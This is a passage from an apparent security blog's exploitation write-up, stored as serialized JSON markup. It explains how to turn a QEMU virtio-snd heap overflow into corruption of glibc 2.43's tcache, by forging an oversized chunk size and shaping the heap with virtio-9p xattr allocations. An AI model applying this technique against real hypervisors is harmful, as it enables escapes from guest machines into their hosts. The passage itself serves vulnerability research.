__builtin_expect",{"type":26,"tag":137,"props":129544,"children":129545},{"style":5601},[129546],{"type":32,"value":4625},{"type":26,"tag":137,"props":129548,"children":129549},{"style":5682},[129550],{"type":32,"value":129551},"misaligned_chunk",{"type":26,"tag":137,"props":129553,"children":129554},{"style":5601},[129555],{"type":32,"value":129556}," (p), ",{"type":26,"tag":137,"props":129558,"children":129559},{"style":5626},[129560],{"type":32,"value":1817},{"type":26,"tag":137,"props":129562,"children":129563},{"style":5601},[129564],{"type":32,"value":22305},{"type":26,"tag":137,"props":129566,"children":129567},{"class":5559,"line":6225},[129568,129573,129577,129582],{"type":26,"tag":137,"props":129569,"children":129570},{"style":5682},[129571],{"type":32,"value":129572},"    malloc_printerr",{"type":26,"tag":137,"props":129574,"children":129575},{"style":5601},[129576],{"type":32,"value":4625},{"type":26,"tag":137,"props":129578,"children":129579},{"style":6837},[129580],{"type":32,"value":129581},"\"free(): invalid pointer\"",{"type":26,"tag":137,"props":129583,"children":129584},{"style":5601},[129585],{"type":32,"value":6430},{"type":26,"tag":137,"props":129587,"children":129588},{"class":5559,"line":6238},[129589],{"type":26,"tag":137,"props":129590,"children":129591},{"style":5564},[129592],{"type":32,"value":129593},"  /* We know that each chunk is at least MINSIZE bytes in size or a\n",{"type":26,"tag":137,"props":129595,"children":129596},{"class":5559,"line":6247},[129597],{"type":26,"tag":137,"props":129598,"children":129599},{"style":5564},[129600],{"type":32,"value":129601},"     multiple of MALLOC_ALIGNMENT.  */\n",{"type":26,"tag":137,"props":129603,"children":129604},{"class":5559,"line":6270},[129605,129609,129613,129618,129623,129627,129632,129636,129640,129645],{"type":26,"tag":137,"props":129606,"children":129607},{"style":5610},[129608],{"type":32,"value":33989},{"type":26,"tag":137,"props":129610,"children":129611},{"style":5601},[129612],{"type":32,"value":4625},{"type":26,"tag":137,"props":129614,"children":129615},{"style":5682},[129616],{"type":32,"value":129617},"__glibc_unlikely",{"type":26,"tag":137,"props":129619,"children":129620},{"style":5601},[129621],{"type":32,"value":129622}," (size ",{"type":26,"tag":137,"props":129624,"children":129625},{"style":5590},[129626],{"type":32,"value":8391},{"type":26,"tag":137,"props":129628,"children":129629},{"style":5601},[129630],{"type":32,"value":129631}," MINSIZE ",{"type":26,"tag":137,"props":129633,"children":129634},{"style":5590},[129635],{"type":32,"value":24998},{"type":26,"tag":137,"props":129637,"children":129638},{"style":5590},[129639],{"type":32,"value":15455},{"type":26,"tag":137,"props":129641,"children":129642},{"style":5682},[129643],{"type":32,"value":129644},"aligned_OK",{"type":26,"tag":137,"props":129646,"children":129647},{"style":5601},[129648],{"type":32,"value":129649}," (size)))\n",{"type":26,"tag":137,"props":129651,"children":129652},{"class":5559,"line":6279},[129653,129657,129661,129666],{"type":26,"tag":137,"props":129654,"children":129655},{"style":5682},[129656],{"type":32,"value":129572},{"type":26,"tag":137,"props":129658,"children":129659},{"style":5601},[129660],{"type":32,"value":4625},{"type":26,"tag":137,"props":129662,"children":129663},{"style":6837},[129664],{"type":32,"value":129665},"\"free(): invalid size\"",{"type":26,"tag":137,"props":129667,"children":129668},{"style":5601},[129669],{"type":32,"value":6430},{"type":26,"tag":137,"props":129671,"children":129672},{"class":5559,"line":6288},[129673],{"type":26,"tag":137,"props":129674,"children":129675},{"emptyLinePlaceholder":18},[129676],{"type":32,"value":6276},{"type":26,"tag":137,"props":129678,"children":129679},{"class":5559,"line":6355},[129680,129685],{"type":26,"tag":137,"props":129681,"children":129682},{"style":5682},[129683],{"type":32,"value":129684},"  check_inuse_chunk",{"type":26,"tag":137,"props":129686,"children":129687},{"style":5601},[129688],{"type":32,"value":129689},"(av, p);\n",{"type":26,"tag":137,"props":129691,"children":129692},{"class":5559,"line":6363},[129693],{"type":26,"tag":137,"props":129694,"children":129695},{"emptyLinePlaceholder":18},[129696],{"type":32,"value":6276},{"type":26,"tag":137,"props":129698,"children":129699},{"class":5559,"line":6393},[129700],{"type":26,"tag":137,"props":129701,"children":129702},{"style":5601},[129703],{"type":32,"value":129704},"  [...]\n",{"type":26,"tag":35,"props":129706,"children":129707},{},[129708],{"type":32,"value":129709},"The first check verifies that the chunk pointer itself is not misaligned. Since we do not control the pointer, this is not particularly relevant here.",{"type":26,"tag":35,"props":129711,"children":129712},{},[129713,129715,129720,129722,129727,129729,129734,129736,129741],{"type":32,"value":129714},"The next check, however, ensures that the ",{"type":26,"tag":130,"props":129716,"children":129718},{"className":129717},[],[129719],{"type":32,"value":126812},{"type":32,"value":129721}," field is 16-byte aligned. This means that the low byte we overwrite in ",{"type":26,"tag":130,"props":129723,"children":129725},{"className":129724},[],[129726],{"type":32,"value":126812},{"type":32,"value":129728}," must preserve alignment while also avoiding the ",{"type":26,"tag":130,"props":129730,"children":129732},{"className":129731},[],[129733],{"type":32,"value":128980},{"type":32,"value":129735}," bit. Under those constraints, exploiting the bug through ",{"type":26,"tag":130,"props":129737,"children":129739},{"className":129738},[],[129740],{"type":32,"value":126812},{"type":32,"value":129742}," corruption looked very unreliable at first.",{"type":26,"tag":35,"props":129744,"children":129745},{},[129746],{"type":32,"value":129747},"Still, we wanted to check how this behaved in the latest glibc 2.43:",{"type":26,"tag":5512,"props":129749,"children":129751},{"code":129750,"language":4326,"meta":7,"className":19107,"style":7},"void\n__libc_free (void *mem)\n{\n  mchunkptr p;\n\n  p = mem2chunk (mem);\n\n  INTERNAL_SIZE_T size = chunksize (p);\n\n  if (__glibc_unlikely (misaligned_chunk (p)))\n    return malloc_printerr_tail (\"free(): invalid pointer\");\n\n#if USE_TCACHE\n  if (__glibc_likely (size \u003C mp_.tcache_max_bytes))\n    {\n      [...]\n\n      return tcache_put (p, tc_idx);\n    }\n",[129752],{"type":26,"tag":130,"props":129753,"children":129754},{"__ignoreMap":7},[129755,129763,129790,129797,129804,129811,129830,129837,129857,129864,129892,129916,129923,129936,129978,129985,129993,130000,130017],{"type":26,"tag":137,"props":129756,"children":129757},{"class":5559,"line":5560},[129758],{"type":26,"tag":137,"props":129759,"children":129760},{"style":5573},[129761],{"type":32,"value":129762},"void\n",{"type":26,"tag":137,"props":129764,"children":129765},{"class":5559,"line":5412},[129766,129770,129774,129778,129782,129786],{"type":26,"tag":137,"props":129767,"children":129768},{"style":5682},[129769],{"type":32,"value":129028},{"type":26,"tag":137,"props":129771,"children":129772},{"style":5601},[129773],{"type":32,"value":4625},{"type":26,"tag":137,"props":129775,"children":129776},{"style":5573},[129777],{"type":32,"value":54230},{"type":26,"tag":137,"props":129779,"children":129780},{"style":5590},[129781],{"type":32,"value":12406},{"type":26,"tag":137,"props":129783,"children":129784},{"style":5584},[129785],{"type":32,"value":43261},{"type":26,"tag":137,"props":129787,"children":129788},{"style":5601},[129789],{"type":32,"value":5742},{"type":26,"tag":137,"props":129791,"children":129792},{"class":5559,"line":5417},[129793],{"type":26,"tag":137,"props":129794,"children":129795},{"style":5601},[129796],{"type":32,"value":13471},{"type":26,"tag":137,"props":129798,"children":129799},{"class":5559,"line":5642},[129800],{"type":26,"tag":137,"props":129801,"children":129802},{"style":5601},[129803],{"type":32,"value":129071},{"type":26,"tag":137,"props":129805,"children":129806},{"class":5559,"line":5745},[129807],{"type":26,"tag":137,"props":129808,"children":129809},{"emptyLinePlaceholder":18},[129810],{"type":32,"value":6276},{"type":26,"tag":137,"props":129812,"children":129813},{"class":5559,"line":5850},[129814,129818,129822,129826],{"type":26,"tag":137,"props":129815,"children":129816},{"style":5601},[129817],{"type":32,"value":129086},{"type":26,"tag":137,"props":129819,"children":129820},{"style":5590},[129821],{"type":32,"value":289},{"type":26,"tag":137,"props":129823,"children":129824},{"style":5682},[129825],{"type":32,"value":129095},{"type":26,"tag":137,"props":129827,"children":129828},{"style":5601},[129829],{"type":32,"value":129100},{"type":26,"tag":137,"props":129831,"children":129832},{"class":5559,"line":5878},[129833],{"type":26,"tag":137,"props":129834,"children":129835},{"emptyLinePlaceholder":18},[129836],{"type":32,"value":6276},{"type":26,"tag":137,"props":129838,"children":129839},{"class":5559,"line":5891},[129840,129845,129849,129853],{"type":26,"tag":137,"props":129841,"children":129842},{"style":5601},[129843],{"type":32,"value":129844},"  INTERNAL_SIZE_T size ",{"type":26,"tag":137,"props":129846,"children":129847},{"style":5590},[129848],{"type":32,"value":289},{"type":26,"tag":137,"props":129850,"children":129851},{"style":5682},[129852],{"type":32,"value":129422},{"type":26,"tag":137,"props":129854,"children":129855},{"style":5601},[129856],{"type":32,"value":129141},{"type":26,"tag":137,"props":129858,"children":129859},{"class":5559,"line":5909},[129860],{"type":26,"tag":137,"props":129861,"children":129862},{"emptyLinePlaceholder":18},[129863],{"type":32,"value":6276},{"type":26,"tag":137,"props":129865,"children":129866},{"class":5559,"line":5930},[129867,129871,129875,129879,129883,129887],{"type":26,"tag":137,"props":129868,"children":129869},{"style":5610},[129870],{"type":32,"value":33989},{"type":26,"tag":137,"props":129872,"children":129873},{"style":5601},[129874],{"type":32,"value":4625},{"type":26,"tag":137,"props":129876,"children":129877},{"style":5682},[129878],{"type":32,"value":129617},{"type":26,"tag":137,"props":129880,"children":129881},{"style":5601},[129882],{"type":32,"value":4625},{"type":26,"tag":137,"props":129884,"children":129885},{"style":5682},[129886],{"type":32,"value":129551},{"type":26,"tag":137,"props":129888,"children":129889},{"style":5601},[129890],{"type":32,"value":129891}," (p)))\n",{"type":26,"tag":137,"props":129893,"children":129894},{"class":5559,"line":5939},[129895,129899,129904,129908,129912],{"type":26,"tag":137,"props":129896,"children":129897},{"style":5610},[129898],{"type":32,"value":19582},{"type":26,"tag":137,"props":129900,"children":129901},{"style":5682},[129902],{"type":32,"value":129903}," malloc_printerr_tail",{"type":26,"tag":137,"props":129905,"children":129906},{"style":5601},[129907],{"type":32,"value":4625},{"type":26,"tag":137,"props":129909,"children":129910},{"style":6837},[129911],{"type":32,"value":129581},{"type":26,"tag":137,"props":129913,"children":129914},{"style":5601},[129915],{"type":32,"value":6430},{"type":26,"tag":137,"props":129917,"children":129918},{"class":5559,"line":6191},[129919],{"type":26,"tag":137,"props":129920,"children":129921},{"emptyLinePlaceholder":18},[129922],{"type":32,"value":6276},{"type":26,"tag":137,"props":129924,"children":129925},{"class":5559,"line":6208},[129926,129931],{"type":26,"tag":137,"props":129927,"children":129928},{"style":5610},[129929],{"type":32,"value":129930},"#if",{"type":26,"tag":137,"props":129932,"children":129933},{"style":5682},[129934],{"type":32,"value":129935}," USE_TCACHE\n",{"type":26,"tag":137,"props":129937,"children":129938},{"class":5559,"line":6225},[129939,129943,129947,129952,129956,129960,129965,129969,129974],{"type":26,"tag":137,"props":129940,"children":129941},{"style":5610},[129942],{"type":32,"value":33989},{"type":26,"tag":137,"props":129944,"children":129945},{"style":5601},[129946],{"type":32,"value":4625},{"type":26,"tag":137,"props":129948,"children":129949},{"style":5682},[129950],{"type":32,"value":129951},"__glibc_likely",{"type":26,"tag":137,"props":129953,"children":129954},{"style":5601},[129955],{"type":32,"value":129622},{"type":26,"tag":137,"props":129957,"children":129958},{"style":5590},[129959],{"type":32,"value":8391},{"type":26,"tag":137,"props":129961,"children":129962},{"style":5584},[129963],{"type":32,"value":129964}," mp_",{"type":26,"tag":137,"props":129966,"children":129967},{"style":5601},[129968],{"type":32,"value":470},{"type":26,"tag":137,"props":129970,"children":129971},{"style":5584},[129972],{"type":32,"value":129973},"tcache_max_bytes",{"type":26,"tag":137,"props":129975,"children":129976},{"style":5601},[129977],{"type":32,"value":22305},{"type":26,"tag":137,"props":129979,"children":129980},{"class":5559,"line":6238},[129981],{"type":26,"tag":137,"props":129982,"children":129983},{"style":5601},[129984],{"type":32,"value":31781},{"type":26,"tag":137,"props":129986,"children":129987},{"class":5559,"line":6247},[129988],{"type":26,"tag":137,"props":129989,"children":129990},{"style":5601},[129991],{"type":32,"value":129992},"      [...]\n",{"type":26,"tag":137,"props":129994,"children":129995},{"class":5559,"line":6270},[129996],{"type":26,"tag":137,"props":129997,"children":129998},{"emptyLinePlaceholder":18},[129999],{"type":32,"value":6276},{"type":26,"tag":137,"props":130001,"children":130002},{"class":5559,"line":6279},[130003,130007,130012],{"type":26,"tag":137,"props":130004,"children":130005},{"style":5610},[130006],{"type":32,"value":41953},{"type":26,"tag":137,"props":130008,"children":130009},{"style":5682},[130010],{"type":32,"value":130011}," tcache_put",{"type":26,"tag":137,"props":130013,"children":130014},{"style":5601},[130015],{"type":32,"value":130016}," (p, tc_idx);\n",{"type":26,"tag":137,"props":130018,"children":130019},{"class":5559,"line":6288},[130020],{"type":26,"tag":137,"props":130021,"children":130022},{"style":5601},[130023],{"type":32,"value":5945},{"type":26,"tag":35,"props":130025,"children":130026},{},[130027,130029,130034],{"type":32,"value":130028},"It is easy to notice that, when taking the tcache path, there are essentially no integrity checks on the ",{"type":26,"tag":130,"props":130030,"children":130032},{"className":130031},[],[130033],{"type":32,"value":126812},{"type":32,"value":130035}," field beyond the basic size-range decision needed to determine whether the chunk fits into tcache. The only explicit check here is that the pointer itself is aligned, which is not something we care about.",{"type":26,"tag":35,"props":130037,"children":130038},{},[130039,130041,130047,130048,130053],{"type":32,"value":130040},"In fact, even the version prior to 2.43 still performed more validation on the tcache path by calling ",{"type":26,"tag":130,"props":130042,"children":130044},{"className":130043},[],[130045],{"type":32,"value":130046},"check_inuse_chunk",{"type":32,"value":4625},{"type":26,"tag":130,"props":130049,"children":130051},{"className":130050},[],[130052],{"type":32,"value":126940},{"type":32,"value":26537},{"type":26,"tag":5512,"props":130055,"children":130057},{"code":130056,"language":4326,"meta":7,"className":19107,"style":7},"void\n__libc_free (void *mem)\n{\n  mchunkptr p;\n\n  p = mem2chunk (mem);\n\n  INTERNAL_SIZE_T size = chunksize (p);\n\n  if (__glibc_unlikely (misaligned_chunk (p)))\n    return malloc_printerr_tail (\"free(): invalid pointer\");\n\n  check_inuse_chunk (arena_for_chunk (p), p);             // [1]\n\n#if USE_TCACHE\n  if (__glibc_likely (size \u003C mp_.tcache_max_bytes && tcache != NULL))\n  [...]\n",[130058],{"type":26,"tag":130,"props":130059,"children":130060},{"__ignoreMap":7},[130061,130068,130095,130102,130109,130116,130135,130142,130161,130168,130195,130218,130225,130251,130258,130269,130326],{"type":26,"tag":137,"props":130062,"children":130063},{"class":5559,"line":5560},[130064],{"type":26,"tag":137,"props":130065,"children":130066},{"style":5573},[130067],{"type":32,"value":129762},{"type":26,"tag":137,"props":130069,"children":130070},{"class":5559,"line":5412},[130071,130075,130079,130083,130087,130091],{"type":26,"tag":137,"props":130072,"children":130073},{"style":5682},[130074],{"type":32,"value":129028},{"type":26,"tag":137,"props":130076,"children":130077},{"style":5601},[130078],{"type":32,"value":4625},{"type":26,"tag":137,"props":130080,"children":130081},{"style":5573},[130082],{"type":32,"value":54230},{"type":26,"tag":137,"props":130084,"children":130085},{"style":5590},[130086],{"type":32,"value":12406},{"type":26,"tag":137,"props":130088,"children":130089},{"style":5584},[130090],{"type":32,"value":43261},{"type":26,"tag":137,"props":130092,"children":130093},{"style":5601},[130094],{"type":32,"value":5742},{"type":26,"tag":137,"props":130096,"children":130097},{"class":5559,"line":5417},[130098],{"type":26,"tag":137,"props":130099,"children":130100},{"style":5601},[130101],{"type":32,"value":13471},{"type":26,"tag":137,"props":130103,"children":130104},{"class":5559,"line":5642},[130105],{"type":26,"tag":137,"props":130106,"children":130107},{"style":5601},[130108],{"type":32,"value":129071},{"type":26,"tag":137,"props":130110,"children":130111},{"class":5559,"line":5745},[130112],{"type":26,"tag":137,"props":130113,"children":130114},{"emptyLinePlaceholder":18},[130115],{"type":32,"value":6276},{"type":26,"tag":137,"props":130117,"children":130118},{"class":5559,"line":5850},[130119,130123,130127,130131],{"type":26,"tag":137,"props":130120,"children":130121},{"style":5601},[130122],{"type":32,"value":129086},{"type":26,"tag":137,"props":130124,"children":130125},{"style":5590},[130126],{"type":32,"value":289},{"type":26,"tag":137,"props":130128,"children":130129},{"style":5682},[130130],{"type":32,"value":129095},{"type":26,"tag":137,"props":130132,"children":130133},{"style":5601},[130134],{"type":32,"value":129100},{"type":26,"tag":137,"props":130136,"children":130137},{"class":5559,"line":5878},[130138],{"type":26,"tag":137,"props":130139,"children":130140},{"emptyLinePlaceholder":18},[130141],{"type":32,"value":6276},{"type":26,"tag":137,"props":130143,"children":130144},{"class":5559,"line":5891},[130145,130149,130153,130157],{"type":26,"tag":137,"props":130146,"children":130147},{"style":5601},[130148],{"type":32,"value":129844},{"type":26,"tag":137,"props":130150,"children":130151},{"style":5590},[130152],{"type":32,"value":289},{"type":26,"tag":137,"props":130154,"children":130155},{"style":5682},[130156],{"type":32,"value":129422},{"type":26,"tag":137,"props":130158,"children":130159},{"style":5601},[130160],{"type":32,"value":129141},{"type":26,"tag":137,"props":130162,"children":130163},{"class":5559,"line":5909},[130164],{"type":26,"tag":137,"props":130165,"children":130166},{"emptyLinePlaceholder":18},[130167],{"type":32,"value":6276},{"type":26,"tag":137,"props":130169,"children":130170},{"class":5559,"line":5930},[130171,130175,130179,130183,130187,130191],{"type":26,"tag":137,"props":130172,"children":130173},{"style":5610},[130174],{"type":32,"value":33989},{"type":26,"tag":137,"props":130176,"children":130177},{"style":5601},[130178],{"type":32,"value":4625},{"type":26,"tag":137,"props":130180,"children":130181},{"style":5682},[130182],{"type":32,"value":129617},{"type":26,"tag":137,"props":130184,"children":130185},{"style":5601},[130186],{"type":32,"value":4625},{"type":26,"tag":137,"props":130188,"children":130189},{"style":5682},[130190],{"type":32,"value":129551},{"type":26,"tag":137,"props":130192,"children":130193},{"style":5601},[130194],{"type":32,"value":129891},{"type":26,"tag":137,"props":130196,"children":130197},{"class":5559,"line":5939},[130198,130202,130206,130210,130214],{"type":26,"tag":137,"props":130199,"children":130200},{"style":5610},[130201],{"type":32,"value":19582},{"type":26,"tag":137,"props":130203,"children":130204},{"style":5682},[130205],{"type":32,"value":129903},{"type":26,"tag":137,"props":130207,"children":130208},{"style":5601},[130209],{"type":32,"value":4625},{"type":26,"tag":137,"props":130211,"children":130212},{"style":6837},[130213],{"type":32,"value":129581},{"type":26,"tag":137,"props":130215,"children":130216},{"style":5601},[130217],{"type":32,"value":6430},{"type":26,"tag":137,"props":130219,"children":130220},{"class":5559,"line":6191},[130221],{"type":26,"tag":137,"props":130222,"children":130223},{"emptyLinePlaceholder":18},[130224],{"type":32,"value":6276},{"type":26,"tag":137,"props":130226,"children":130227},{"class":5559,"line":6208},[130228,130232,130236,130241,130246],{"type":26,"tag":137,"props":130229,"children":130230},{"style":5682},[130231],{"type":32,"value":129684},{"type":26,"tag":137,"props":130233,"children":130234},{"style":5601},[130235],{"type":32,"value":4625},{"type":26,"tag":137,"props":130237,"children":130238},{"style":5682},[130239],{"type":32,"value":130240},"arena_for_chunk",{"type":26,"tag":137,"props":130242,"children":130243},{"style":5601},[130244],{"type":32,"value":130245}," (p), p);",{"type":26,"tag":137,"props":130247,"children":130248},{"style":5564},[130249],{"type":32,"value":130250},"             // [1]\n",{"type":26,"tag":137,"props":130252,"children":130253},{"class":5559,"line":6225},[130254],{"type":26,"tag":137,"props":130255,"children":130256},{"emptyLinePlaceholder":18},[130257],{"type":32,"value":6276},{"type":26,"tag":137,"props":130259,"children":130260},{"class":5559,"line":6238},[130261,130265],{"type":26,"tag":137,"props":130262,"children":130263},{"style":5610},[130264],{"type":32,"value":129930},{"type":26,"tag":137,"props":130266,"children":130267},{"style":5682},[130268],{"type":32,"value":129935},{"type":26,"tag":137,"props":130270,"children":130271},{"class":5559,"line":6247},[130272,130276,130280,130284,130288,130292,130296,130300,130304,130308,130313,130317,130322],{"type":26,"tag":137,"props":130273,"children":130274},{"style":5610},[130275],{"type":32,"value":33989},{"type":26,"tag":137,"props":130277,"children":130278},{"style":5601},[130279],{"type":32,"value":4625},{"type":26,"tag":137,"props":130281,"children":130282},{"style":5682},[130283],{"type":32,"value":129951},{"type":26,"tag":137,"props":130285,"children":130286},{"style":5601},[130287],{"type":32,"value":129622},{"type":26,"tag":137,"props":130289,"children":130290},{"style":5590},[130291],{"type":32,"value":8391},{"type":26,"tag":137,"props":130293,"children":130294},{"style":5584},[130295],{"type":32,"value":129964},{"type":26,"tag":137,"props":130297,"children":130298},{"style":5601},[130299],{"type":32,"value":470},{"type":26,"tag":137,"props":130301,"children":130302},{"style":5584},[130303],{"type":32,"value":129973},{"type":26,"tag":137,"props":130305,"children":130306},{"style":5590},[130307],{"type":32,"value":16776},{"type":26,"tag":137,"props":130309,"children":130310},{"style":5601},[130311],{"type":32,"value":130312}," tcache ",{"type":26,"tag":137,"props":130314,"children":130315},{"style":5590},[130316],{"type":32,"value":18280},{"type":26,"tag":137,"props":130318,"children":130319},{"style":5573},[130320],{"type":32,"value":130321}," NULL",{"type":26,"tag":137,"props":130323,"children":130324},{"style":5601},[130325],{"type":32,"value":22305},{"type":26,"tag":137,"props":130327,"children":130328},{"class":5559,"line":6270},[130329],{"type":26,"tag":137,"props":130330,"children":130331},{"style":5601},[130332],{"type":32,"value":129704},{"type":26,"tag":35,"props":130334,"children":130335},{},[130336,130338,130343],{"type":32,"value":130337},"This means that as long as we can reliably force the corrupted chunk down the tcache path, we no longer need to worry much about integrity checks on ",{"type":26,"tag":130,"props":130339,"children":130341},{"className":130340},[],[130342],{"type":32,"value":126812},{"type":32,"value":130344},", because on the latest 2.43 glibc they are non-existent.",{"type":26,"tag":3265,"props":130346,"children":130347},{},[],{"type":26,"tag":35,"props":130349,"children":130350},{},[130351,130353,130358,130360,130366,130368,130373,130375,130381],{"type":32,"value":130352},"With that in mind, the idea we settled on was to allocate a chunk whose ",{"type":26,"tag":130,"props":130354,"children":130356},{"className":130355},[],[130357],{"type":32,"value":126812},{"type":32,"value":130359}," field was initially ",{"type":26,"tag":130,"props":130361,"children":130363},{"className":130362},[],[130364],{"type":32,"value":130365},"0x200",{"type":32,"value":130367},", then trigger the overflow and corrupt only its low byte. If the byte written is at least ",{"type":26,"tag":130,"props":130369,"children":130371},{"className":130370},[],[130372],{"type":32,"value":128988},{"type":32,"value":130374},", the resulting value would correspond to a larger, tcache-eligible, size in range ",{"type":26,"tag":130,"props":130376,"children":130378},{"className":130377},[],[130379],{"type":32,"value":130380},"[0x210, 0x2f0]",{"type":32,"value":130382},". That would let us free the chunk as an oversized entry into the tcache freelist, which we could later reclaim and overlap chunks for a better primitive.",{"type":26,"tag":35,"props":130384,"children":130385},{},[130386],{"type":32,"value":130387},"This approach gives us much better odds of success. In fact, with the stream configuration we use later, we can make this behavior reliable enough to exploit consistently.",{"type":26,"tag":118,"props":130389,"children":130391},{"id":130390},"heap-spraying",[130392],{"type":32,"value":130393},"Heap Spraying",{"type":26,"tag":35,"props":130395,"children":130396},{},[130397,130399,130404],{"type":32,"value":130398},"With that idea in mind, we now need a way to shape the heap so that a ",{"type":26,"tag":130,"props":130400,"children":130402},{"className":130401},[],[130403],{"type":32,"value":130365},{"type":32,"value":130405},"-sized chunk is placed immediately after the vulnerable virtio-snd buffer. In addition, we need to drain any existing entries from the relevant tcache freelist so that it is not full when we later free the corrupted oversized chunk.",{"type":26,"tag":35,"props":130407,"children":130408},{},[130409,130411,130416],{"type":32,"value":130410},"Unfortunately, while virtio-snd does provide some heap spraying primitives through its buffer allocations, they are fairly limited. For example, we could only allocate up to 64 buffers at a time. On top of that, ",{"type":26,"tag":130,"props":130412,"children":130414},{"className":130413},[],[130415],{"type":32,"value":127006},{"type":32,"value":130417}," is a FIFO queue, so we could not control the order in which those buffers were freed - they would always be released in the same order they were inserted.",{"type":26,"tag":35,"props":130419,"children":130420},{},[130421],{"type":32,"value":130422},"For the purposes of this blog post, we therefore enabled another virtio device to help with heap shaping.",{"type":26,"tag":21485,"props":130424,"children":130426},{"id":130425},"virtio-9p",[130427],{"type":32,"value":130425},{"type":26,"tag":35,"props":130429,"children":130430},{},[130431,130436],{"type":26,"tag":130,"props":130432,"children":130434},{"className":130433},[],[130435],{"type":32,"value":130425},{"type":32,"value":130437}," is a paravirtualized filesystem device that lets the guest access a directory exported by the host through the 9P protocol. The part that interested us most was its handling of extended attributes, or xattrs.",{"type":26,"tag":35,"props":130439,"children":130440},{},[130441,130443,130449,130451,130457,130458,130464,130466,130471],{"type":32,"value":130442},"Through a ",{"type":26,"tag":130,"props":130444,"children":130446},{"className":130445},[],[130447],{"type":32,"value":130448},"P9_TXATTRCREATE",{"type":32,"value":130450}," request, we can allocate host-side buffers for both the ",{"type":26,"tag":130,"props":130452,"children":130454},{"className":130453},[],[130455],{"type":32,"value":130456},".name",{"type":32,"value":3339},{"type":26,"tag":130,"props":130459,"children":130461},{"className":130460},[],[130462],{"type":32,"value":130463},".value",{"type":32,"value":130465}," fields, with the size of ",{"type":26,"tag":130,"props":130467,"children":130469},{"className":130468},[],[130470],{"type":32,"value":130463},{"type":32,"value":130472}," being directly controlled by the guest.",{"type":26,"tag":5512,"props":130474,"children":130476},{"code":130475,"language":4326,"meta":7,"className":19107,"style":7},"static void coroutine_fn v9fs_xattrcreate(void *opaque)\n{\n    int flags, rflags = 0;\n    int32_t fid;\n    uint64_t size;\n    ssize_t err = 0;\n    V9fsString name;\n    size_t offset = 7;\n    V9fsFidState *file_fidp;\n    V9fsFidState *xattr_fidp;\n    V9fsPDU *pdu = opaque;\n\n    v9fs_string_init(&name);\n    err = pdu_unmarshal(pdu, offset, \"dsqd\", &fid, &name, &size, &flags);\n    if (err \u003C 0) {\n        goto out_nofid;\n    }\n\n    [...]\n\n    if (size > P9_XATTR_SIZE_MAX) {\n        err = -E2BIG;\n        goto out_nofid;\n    }\n\n    [...]\n\n    v9fs_string_init(&xattr_fidp->fs.xattr.name);\n    v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name);\n    xattr_fidp->fs.xattr.value = g_malloc0(size);\n}\n",[130477],{"type":26,"tag":130,"props":130478,"children":130479},{"__ignoreMap":7},[130480,130522,130529,130553,130566,130577,130602,130610,130635,130652,130668,130694,130701,130722,130788,130812,130825,130832,130839,130846,130853,130873,130894,130905,130912,130919,130926,130933,130982,131038,131083],{"type":26,"tag":137,"props":130481,"children":130482},{"class":5559,"line":5560},[130483,130487,130491,130496,130501,130505,130509,130513,130518],{"type":26,"tag":137,"props":130484,"children":130485},{"style":5573},[130486],{"type":32,"value":53647},{"type":26,"tag":137,"props":130488,"children":130489},{"style":5573},[130490],{"type":32,"value":53652},{"type":26,"tag":137,"props":130492,"children":130493},{"style":5601},[130494],{"type":32,"value":130495}," coroutine_fn ",{"type":26,"tag":137,"props":130497,"children":130498},{"style":5682},[130499],{"type":32,"value":130500},"v9fs_xattrcreate",{"type":26,"tag":137,"props":130502,"children":130503},{"style":5601},[130504],{"type":32,"value":165},{"type":26,"tag":137,"props":130506,"children":130507},{"style":5573},[130508],{"type":32,"value":54230},{"type":26,"tag":137,"props":130510,"children":130511},{"style":5590},[130512],{"type":32,"value":12406},{"type":26,"tag":137,"props":130514,"children":130515},{"style":5584},[130516],{"type":32,"value":130517},"opaque",{"type":26,"tag":137,"props":130519,"children":130520},{"style":5601},[130521],{"type":32,"value":5742},{"type":26,"tag":137,"props":130523,"children":130524},{"class":5559,"line":5412},[130525],{"type":26,"tag":137,"props":130526,"children":130527},{"style":5601},[130528],{"type":32,"value":13471},{"type":26,"tag":137,"props":130530,"children":130531},{"class":5559,"line":5417},[130532,130536,130541,130545,130549],{"type":26,"tag":137,"props":130533,"children":130534},{"style":5573},[130535],{"type":32,"value":21670},{"type":26,"tag":137,"props":130537,"children":130538},{"style":5601},[130539],{"type":32,"value":130540}," flags, rflags ",{"type":26,"tag":137,"props":130542,"children":130543},{"style":5590},[130544],{"type":32,"value":289},{"type":26,"tag":137,"props":130546,"children":130547},{"style":5626},[130548],{"type":32,"value":5629},{"type":26,"tag":137,"props":130550,"children":130551},{"style":5601},[130552],{"type":32,"value":5604},{"type":26,"tag":137,"props":130554,"children":130555},{"class":5559,"line":5642},[130556,130561],{"type":26,"tag":137,"props":130557,"children":130558},{"style":5573},[130559],{"type":32,"value":130560},"    int32_t",{"type":26,"tag":137,"props":130562,"children":130563},{"style":5601},[130564],{"type":32,"value":130565}," fid;\n",{"type":26,"tag":137,"props":130567,"children":130568},{"class":5559,"line":5745},[130569,130573],{"type":26,"tag":137,"props":130570,"children":130571},{"style":5573},[130572],{"type":32,"value":58215},{"type":26,"tag":137,"props":130574,"children":130575},{"style":5601},[130576],{"type":32,"value":127153},{"type":26,"tag":137,"props":130578,"children":130579},{"class":5559,"line":5850},[130580,130585,130590,130594,130598],{"type":26,"tag":137,"props":130581,"children":130582},{"style":5573},[130583],{"type":32,"value":130584},"    ssize_t",{"type":26,"tag":137,"props":130586,"children":130587},{"style":5601},[130588],{"type":32,"value":130589}," err ",{"type":26,"tag":137,"props":130591,"children":130592},{"style":5590},[130593],{"type":32,"value":289},{"type":26,"tag":137,"props":130595,"children":130596},{"style":5626},[130597],{"type":32,"value":5629},{"type":26,"tag":137,"props":130599,"children":130600},{"style":5601},[130601],{"type":32,"value":5604},{"type":26,"tag":137,"props":130603,"children":130604},{"class":5559,"line":5878},[130605],{"type":26,"tag":137,"props":130606,"children":130607},{"style":5601},[130608],{"type":32,"value":130609},"    V9fsString name;\n",{"type":26,"tag":137,"props":130611,"children":130612},{"class":5559,"line":5891},[130613,130617,130622,130626,130631],{"type":26,"tag":137,"props":130614,"children":130615},{"style":5573},[130616],{"type":32,"value":19157},{"type":26,"tag":137,"props":130618,"children":130619},{"style":5601},[130620],{"type":32,"value":130621}," offset ",{"type":26,"tag":137,"props":130623,"children":130624},{"style":5590},[130625],{"type":32,"value":289},{"type":26,"tag":137,"props":130627,"children":130628},{"style":5626},[130629],{"type":32,"value":130630}," 